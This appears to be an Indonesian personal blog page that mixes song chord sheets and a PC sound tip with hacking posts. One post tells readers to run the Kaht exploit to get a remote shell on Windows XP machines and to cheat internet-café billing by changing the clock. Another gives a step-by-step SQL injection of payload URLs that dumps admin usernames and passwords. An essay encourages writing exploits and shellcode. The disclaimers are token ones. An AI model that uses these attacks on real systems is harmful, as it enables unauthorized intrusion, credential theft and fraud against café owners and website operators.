Hacking Billing Warnet Menggunakan Command Prompt

Sabtu, 30 Juni 2012

Assalamualaikum wr.wb,...
Sedikit mempelajari tingkat security warnet, saya menemukan sebuah cara untuk ngakalin Billing yang ada dalam warnet. bisa dibilang ini merupakan Hacking!!!!!. Manusia dengan iman yang tidak kuat tidak boleh membaca artikel ini,...hohoho,...(Just kidding). Boleh saja asal anda bijak dalam menyikapi.


Wes,..g usah kakean omong,..langsung ae ke topik.
Saya seorang mahasiswa yang bekerja di sebuah warnet disela-sela kuliah saya (nah Lho,...jare langsung nang topik!!!).hehehe,...
Saya mencoba Hacking billing diwarnet saya sendiri,..saya ingin tau cara hacking billing karena saya juga ingin tau bagaimana cara ngatasinya.
Wah,...malah curhat lagi,..!!!hehehe,...

Langsung ke Step2nya ja wes,...
Pertama periksa dahulu spesifikasi dari warnet apakah sebagai berikut:
1. Server billing sebagai tempat pembayaran menggunakan Windows XP.
2. Billing Client adalah billing explorer.
3. Koneksi antar billing menggunakan LAN biasa.
4. Baik Client maupun Server billing kurang aman

Kalo syarat uda terpenuhi,..maka sudah sah(koyok nikah ae!!!). Silahkan cari aplikasi yg bernama Kaht yang digunakan untuk masuk keserver. Aplikasi ini cukup sulit untuk dicari karena memang terlarang. Tapi g usah khawatir,..yg butuh bisa klik disini .

Berikut ini cara menggunakan Kaht :
1. copy file kaht.exe ke drive c (misalnya)
2. buka command prompt c:\
3. ketikkan di prompt tadi c:\kaht.exe ip1 ip2 (contoh : c:\kaht.exe 192.168.1.1 192.168.1.100)
4. ip1 dan ip2 adalah range ip di jaringan kita ( kaht akan menscan computer yang vuln (biasanya win xp sp 1 kebawah)
5. setelah kaht mendapatkan komputer yang vuln dia akan langsung masuk ke komputer tadi dan prompt c:\ kita tadi akan berubah menjadi prompt c:\system32\ pada komputer korban, apabila itu terjadi maka artinya kita sudah ada di komputer korban tersebut
6. selanjutnya gunakan kemampuan kamu untuk mengeksplorasi komputer dengan menggunakan berbagai perintah dos
7. selamat belajar


Saya melihat di billing clientnya, ternyata jam yang terpampang di client sama dengan jam di billing dengan asumsi perhitungan koneksi mengikuti arah jam client. Wah, saya terus bergembira, ternyata caranya saya kira lebih mudah :P
Lalu saya coba buka START =-> Run =-> Command,
Maka keluarlah kotak hitam seperti ini :



Lalu saya coba ketikkan "time" (tanpa tanda petik), dan muncul seperti ini :

Setelah itu saya coba ganti waktunya menjadi 20 menit sebelumnya dan ternyata berhasil . berikut ini hasilnya :

Tetapi meskipun cara ini sangat praktis, tapi juga kadang terhadi kegagalan. Semua itu tergantung dari tingkat keamanan warnet dan keahlian sang pemakai, hehehe.

Pesan saya buat para pembaca, sebaiknya Anda bijak dalam menyikapi artikel ini karena aktivitas ini bisa disebut sebagai aktivitas Cracking (Black Hacking). So,...ini hanya sebatas pengetahuan aja.

Semoga bisa menambah wawasan kita semua.

CB band - Nyaris sendiri

Jumat, 15 Juni 2012


Intro:
C Bm am G (4x)

G CD
Ketika aku beranjak dewasa
G CD
Mulai kutinggalkan masa remaja
G CD
Mencoba apa yang namanya cinta
G CD
Bergelut dengan seorang wanita

C Bm am G (2x)

G CD
Kau bilang tak punya selera
G CD
Kau sebut juga pria tak berdaya
G CD
Apa sebenarnya yang namanya cinta
G CD
Bukan sekedar peraduan belaka

Em C G D
Indah dunia kurasa walau tanpa cinta
Em C G D
Berjalan nyata hinggakupun nyaris sendiri

Reff:
G C Em D
Aku tak malu mesti kau bilang tak punya kekasih
G C Em D
Aku percaya pada tuhan pencipta cinta

klo mau download mp3 nya silakan download di sini

Mengapa sound pada komputer tidak bisa bunyi, padahal driver sudah di install?

Jumat, 08 Juni 2012

Mungkin kamu belum install driver HD Audionya
Berikut beberapa hal yang bisa anda coba:

1. Instal Microsoft HD Audio patch di sini
2. Start--->Run--->Ketik "services.msc" tanpa kutip, lalu perhatikan pada jendela sebelah kanan dan lihat service "Windows Audio" bila dalam keadaan "stopped" klik kanan lalu start.

3. Ulangi rentetan install drivernya dan pastikan bahwa driver yang anda install sesuai dengan hardwarenya, untuk caranya bisa anda lihat spesifikasi motherboard anda di internet.

Iwan Fals - Manusia Setengah Dewa

Kamis, 07 Juni 2012

Intro : A A

A           E        F#m   C#m
Wahai presiden kami yang baru
  D                      E
Kamu harus dengar suara ini
A             E        F#m   C#m
Suara yang keluar dari dalam goa
 D                         E
Goa yang penuh lumut kebosanan

A              E      F#m C#m
Walau hidup adalah permainan
 D                      E
Walau hidup adalah hiburan
A       E           F#m     C#m
Tetapi kami tak mau dipermainkan
    D                    E
Dan kami juga bukan hiburan

      F#m   C#m   D    E
Turunkan harga secepatnya
    F#m   C#m   D    E
Berikan kami pekerjaan
      F#m         C#m
Pasti kuangkat engkau
     D                   E
Menjadi manusia setengah dewa

Chorus:
A          D  A          E
Masalah moral masalah akhlak
      A   D         E
Biar kami cari sendiri
A          D      A          E
Urus saja moralmu urus saja akhlakmu
       A             D          E
Peraturan yang sehat yang kami mau

     F#m   C#m   D          E
Tegakkan hukum setegak-tegaknya
     F#m   C#m  D            E
Adil dan tegas tak pandang bulu
      F#m         C#m
Pasti kuangkat engkau
     D                    E
Menjadi manusia setengah dewa

Intro : A E F#m C#m D E 2X
Back to Chorus

      F#m   C#m   D    E
Turunkan harga secepatnya
    F#m   C#m   D    E
Berikan kami pekerjaan
     F#m   C#m   D          E
Tegakkan hukum setegak-tegaknya
     F#m   C#m D             E
Adil dan tegas tak pandang bulu
      F#m         C#m
Pasti kuangkat engkau
     D                    E
Menjadi manusia setengah dewa

A          E        F#m    C#m
Wahai presiden kami yang baru
  D                      E
Kamu harus dengar suara ini

sql injection

Harap dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak” tidak akan ditanggapi.
Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.
Apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N
oke, mari kita simak bersama-sama.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
Kalo “+” sebagai penghubung perintah…
6. Nah sampe sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…

--What hacker dont want you to know!!!???-

Sebelum kalian memulai melakukan hacking atau istilahnya masuk dunia hacker. Maka ada satu hal yang kalian harus perhatikan dibalik semua exploit, hacking tools, pemrograman, tcpip, dan linux, windows hacking, windows security, identity theft, information theft, evading IDS/IPS/HIPS/Internet Content Filtering, Phising attacks, sql injections, reverse engineering dan lain sebagainya.


Apa itu?


Itu berawal dari pertanyaan kalian "Kok bisa ya malware ini nembus sistem yang aman", "kok bisa ya virus ini gak terdeteksi oleh antivirus", "kok bisa ya command controlnya dia menciptakan payload yang bisa buat banyak komputernya di jadi botnetnya!", dan kok bisa kok bisa lainnya...


Jadi apa itu?


Itu adalah rasa penasaran ingin mengetahui "Inner working" atau "How is it works" dari suatu aktivitas hacking dan cracking.


Lalu, bagaimana kita bisa mengetahui cara kerjanya?


ingat baik baik! dan catat bila perlu!?, hacking itu mulai dari yang remeh temeh sampai yang rumit dan kompleks dilakukan dengan didasari oleh beberapa patokan ilmu, jadi inner workingnya itu dilandasi oleh knowledge, bukan sihir dan bukan sulap.


satu kata penting lagi!


Asosiasi!, ya bagaimana anda mengasosiasikan beberapa disiplin ilmu dan memperlakukan disiplin ilmu itu dengan cara yang tidak biasa, yang nyeleneh, yang kreatif, yang "jahat", dan yang "bandel".


Tujuannya?


kebebasan ekspresi, kebebasan digital, dan sharing knowledge!!!!


Lalu apa disiplin ilmu yang harus dikuasai???


barulah kita masuk ke penopang hacking itu sendiri. Disinilah perkataan eric raymond kena di kita!, Mulai dari programming, bukan hanya bisa buat program tujuannya, tapi bagaimana cara berpikir kita dilatih untuk melihat algoritma dan struktur data bekerja membentuk susunan prosedur atau fungsi kerja yang mencapai tujuan dari program itu sendiri!


Jadi dengan programming, tujuan terselubung yang diinginkan adalah agar kita bisa mengetahui bagaimana pola aplikasi dari mengelola memori, dalam menggunakan memori, dalam memanfaatkan resources hardware, dalam berhubungan dengan mesin dan dalam dalam lainnya yang silahkan di googling.


Kemudian networking, mengetahui TCP IP, bagaimana web bekerja, dan bagaimana server side scripting dan client side scripting bersinergi untuk menciptakan aplikasi. bagaimana socket bekerja, bagaimana layer-layer jaringan bersinergi dan bagaimana kita bisa mengetahui inner working dari jaringan komputer sehingga kita bisa menemukan celah -sesuai dengan kreatifitas berpikir dan gizi kita tentunya- pada masing masing layer, dan bisa menemukan celah pada masing masing bahasa client side scripting, web services, server side scripting, untuk meng-hacking-nya.


Kemudian menanjak ke OS, atau operasi sistem, disitu anda dituntut untuk memulai dari linux, kenapa?


karena linux open source, sederhana, kenapa? karena coding-coding aplikasinya, fungsinya, kernelnya, dan nya-nya yang lain bisa dipelajari untuk selanjutnya menghacking windows..loh loh!!!!??? kok windows, kan gak nyambung!!!


Nyambunglah!!!!, kenapa? karena bila anda berasal dari jurusan IT, anda pasti dapat mata kuliah atau materi sistem operasi. Jadi tidak ada yang magic dalam dunia hacking. Ingat hacking bertujuan untuk kebebasan, kebebasan secara filosofis adalah merusak aturan. Jadi, setiap ada kebebasan, maka harus ada aturan yang mengaturnya....Begitu pula dengan sistem operasi, sudah ada aturannya, dan teknologinya, dan pengembangannya setiap tahun dengan teknologi baru,,...pendek kata, ada standarnya...semakin kita mengetahui standarnya dalam level praktikal (dengan cara mempelajari source code linux!!!!), dan level teoritikal (membaca dokumentasi, standar, dan exploit orang lain), maka anda akan lebih Pd untuk menganalisa "tembok cina" sistem operasi windows berapa pun, mau 7,8,9,dst....

mengapa saya bila tembok cina, karena disinilah anda benar benar mendapat tantangan menghacking aturan yang bersifat proprietary....Anda akan benar benar bermain di dua level dalam menghacking windows ..high level dan low level. high level ada di level yang disebut windows security, low level ada di level yang disebut reverse engineering, yang berhubungan dengan programming yang merupakan tingkatan dunia persilatan pertama dalam memasuki dunia hacker. tujuan high level adalah untuk mengelabui tingkatan user privillege tertinggi untuk menginstall malware, rootkit, dan apalah namanya. Untuk low level adalah untuk melakukan remote exploit dan lain sebagainya.


Intinya adalah untuk mencuri dengan mengatasnamakan kebebasan, mengambil tanpa hak dengan mengatasnamakan kebebasan, mendirikan pusat training dan melakukan pen-test dengan mengatasnamakan keamanan data dan bisnis, dan lainnya.


Kemudian, anda harus melayani budaya hacker sebagaimana kata eric raymond...buat milis, manage news groups, buat website, tulis buku, tulis artikel, tulis ebook. dan jadilah juru bicara bagi kaum hacker...(walaupun anda tidak ditunjuk sebagai juru bicara)....


Bahasa Inggris ??? Penting!!!!, jangan belajar hacking terus-terusan dengan bahasa indonesia, anda akan kehilangan kesempatan untuk menjadi hacker yang hebat. lagi-lagi, tidak ada yang magic dalam dunia hacker. Bila anda telah mengetahui cara kerja web dan internet dan bagaimana pola koneksi ke database, dan bagaimana suatu program dan aplikasi bisa melakukan suatu interaksi dengan database dengan cara yang tidak biasa atau dengan trigger semisal inurl,allinurl,allintext,cache,related,filetype, dan lainnya...maka anda telah mengetahui bagaimana aplikasi web google bekerja untuk berinteraksi dengan databasenya. itulahh yang disebut googledorks.


Jadi, kesimpulannya, jangan pernah merasa rugi untuk belajar IT dan jangan merasa puas seumur hidup jadi script kiddie(maka tools doang, ga bisa buatnya dan ga tau cara kerja inner workingnya dari sisi standar, aturan, protokol, dan disiplin ilmunya)....Mulai detik ini, kita para newbie harus terus belajar, dan berkarya...!!! buat project pribadi, gw


kasih contoh:


ah, gw mau memahami exploit nih!
kalo begitu gw buat project "Memahami Exploit"
jangan lupa stepnya bro:
1. Pelajari assembly language, sampai gw bisa baca op code dengan lancar dan tahu posisi escape character. bahkan sampe lo bisa buat shellcode dibawah 21kb supaya bisa nyangkut di stack untuk trigger EIP. shellcode disebut juga eggcode yang ditrigger sama payload.
2. Pelajari C/C++, sampai gw bisa baca source code exploit.
3. Modif exploit (pada tahap ini modif commentnya dan nama variablenya aja)
4. Baca dokumentasi mengenai servis atau aplikasi, atau software yang vulnerable, dan baca juga dokumentasi dari servis tersebut (kalau terkait TCP/IP, ya baca RFCnya lah), kemudian aplikasi (semisal web framework, datengin tuh websitenya dan baca dokumentasinya), kemudian software (datengin tuh webnya, baca segala yang terkait dengannya, mulai FAQnya, Dokumentasinya, Helpnya, dan tulisan terkaitnya lainnya)....
5. Dari tahap 4, lo bisa mahamin dimana the service, atau the aplikasi, atau the software bermasalah, atau disisimana masalahnya. Ini bagus, untuk melatih kreatifitas lo melihat point of problem, atau error point, atau apalah namanya (gw juga buat2 sendiri)....
6. Peringatan: lo harus kuat diprogramming, sistem operasi, dan networking, seperti gw jelasin sebelumnya... jangan langsung buat project tanpa landasan kuat. ok: langkah selanjutnya adalah modifikasi tahap dua, memodifikasi langkah langkahnya, loopnya, statemen kondisinya, fungsi2nya, untuk melihat errornya.Tapi perlu diperhatikan adalah, jangan melakukan langkah 6 sebelum lo benar benar menjalani tahap 4 dan 5 + peringatan gw. Dan lo harus benar benar paham cara kerja aplikasinya, dimana bermasalahnya, dan bagaimana mengasosiasikan apa yang sudah lo pahamin di langkah 4 dan 5 dengan coding C/C++ atau bahasa program apalah yang lain dengan hasil pemahaman lo mengenai inner workingnya. jadi langkah ke 2 tidak bisa ditinggalkan dari belajar dokumentasi dan buku buku mengenai syntax, library, struktur data, algoritma, dan pattern dari bahasa program tersebut.
7. Buat Exploit lo sendiri untuk menyerang aplikasi/servis/software yang vulnerable tersebut dengan logic lo sendiri, dengan algoritma lo sendiri, dan lebih bagus pake bahasa program sendiri...ups..salah, pake bahasa program lainnya.^_^
8. Sharing ke teman-teman di Jasakom....(kalau ga takut dikejar intel)
9. Mulai explore kelihat exploit lainnya (lebih bagus kalau kalian menemukan 0Day, atau exploit yang belum ada yang buat, kan kalo nyerang microsoft, lebih banyak untungnya...just kiddin ;p)


Perhatian: terkadang dalam memahami suatu vulnerabilitas dari suatu software atau aplikasi atau sistem operasi, kalian harus masuk ke level kernel dan melakukan reverse engineering terhadap aplikasi, fungsi, program, bagian tertentu dari sistem operasi, dan lainnya. hal ini akan mengakibatkan kalian masuk ke disiplin ilmu diassembler, compiler dan lainnya (agak sok tau, tapi still yakin...Huahuahua...)...Jangan takut. kalau kalian sudah mengeksplor linux source code, dan memahaminya dengan baik..tidak akan ada masalah berarti.


Ok....mudah-mudahan bermanfaat omongan saya ini yang saya sendiri bingung milih kata yang


baik dan benar untuk menampilkannya...


tapi artikel ini bisa bermanfaat bagi yang memanfaatkannya, dan tidak bermanfaat bagi yang menganggapnya tidak bermanfaat...mungkin ada aja yang baca dan sukses mengamalkannya...


Peace, Love, dan Respect..(GIGI: 2012)

  --Just for newborn, eh.. Newbie!--
--jangan mau seumur hidup jadi script kiddie---


--Yang ngelantur ini bisa jadi menjadikan kamu hebat---
--Yang penting ng-posting---
--Blog-blog gw, terserah gw mau nulis apa--

Iwan Fals - Lonteku

Intro : Em C Am Em

          Em C Am F Em

          Em C Am Em

          Em C Am F Em

    Em                                     D

Hembusan angin malam waktu itu

          C          Am           Em

Bawa lariku dalam dekapanmu

   Em                            D

Kau usap luka di sekujur tubuh ini

             C                Am         G

Sembunyilah, sembunyi ucapmu

   Em                               D

Nampak jelas rasa takut diwajahmu

         C               Am         Em

Saat petugas datang mencariku

Interlude : Em C Am Em

                Em C Am F Em

Reff :

   C D  G       C     G

Lonteku terima kasih

           C           Am           F   Em

Atas pertolonganmu dimalam itu

   C D  G          C      G

Lonteku dekat padaku

          C           Am       F          Em

Mari kita lanjutkan cerita hari esok

G         D            G           Bm         C

Walau kita berjalan dalam dunia hitam

         Am             F              D

Benih cinta tak pandang siapa

G         D             G           Bm    C

Meski semua orang singkirkan kita

                 Am               F         D         G

Genggam tangan erat-erat kita melangkah

Interlude : Am Bm Am Em

                Am Bm C D Em

Balik ke Reff